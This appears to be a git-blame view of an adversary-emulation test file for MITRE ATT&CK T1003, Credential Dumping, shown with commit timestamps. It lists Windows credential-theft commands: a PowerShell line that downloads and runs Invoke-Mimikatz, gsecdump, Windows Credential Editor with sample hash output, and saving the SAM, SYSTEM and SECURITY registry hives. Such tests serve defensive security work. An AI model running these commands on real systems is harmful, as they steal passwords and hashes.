2017-10-11 10:35:17 -07:00
|
|
|
# Credential Dumping
|
|
|
|
|
|
|
|
|
|
MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## Powershell Mimikatz
|
|
|
|
|
|
|
|
|
|
Input:
|
|
|
|
|
|
|
|
|
|
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
|
|
|
|
|
|
|
|
|
## Gsecdump
|
|
|
|
|
|
|
|
|
|
[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5)
|
|
|
|
|
|
|
|
|
|
Input:
|
|
|
|
|
|
|
|
|
|
gsecdump -a
|
|
|
|
|
|
|
|
|
|
## Windows Credential Editor
|
|
|
|
|
|
|
|
|
|
[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/)
|
|
|
|
|
|
|
|
|
|
Input:
|
|
|
|
|
|
|
|
|
|
wce -o output.txt
|
|
|
|
|
|
|
|
|
|
Output:
|
|
|
|
|
|
|
|
|
|
C:\>wce -o output.txt
|
|
|
|
|
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
|
|
|
|
|
Use -h for help.
|
|
|
|
|
|
|
|
|
|
C:\>type output.txt
|
|
|
|
|
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
|
|
|
|
|
C:\>
|
2018-03-16 14:24:17 +00:00
|
|
|
|
2018-03-21 14:13:10 -04:00
|
|
|
## Registry
|
|
|
|
|
|
|
|
|
|
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys:
|
2018-03-16 14:24:17 +00:00
|
|
|
|
|
|
|
|
Input:
|
2018-03-21 14:13:10 -04:00
|
|
|
|
2018-03-16 14:24:17 +00:00
|
|
|
reg save HKLM\sam sam
|
|
|
|
|
reg save HKLM\system system
|
|
|
|
|
reg save HKLM\security security
|
|
|
|
|
|
|
|
|
|
Output:
|
2018-03-21 14:13:10 -04:00
|
|
|
|
2018-03-16 14:24:17 +00:00
|
|
|
C:\>reg save HKLM\sam sam
|
|
|
|
|
The operation completed successfully.
|
|
|
|
|
|
2018-03-21 14:13:10 -04:00
|
|
|
These can be processed locally using [creddump7](https://github.com/Neohapsis/creddump7)
|
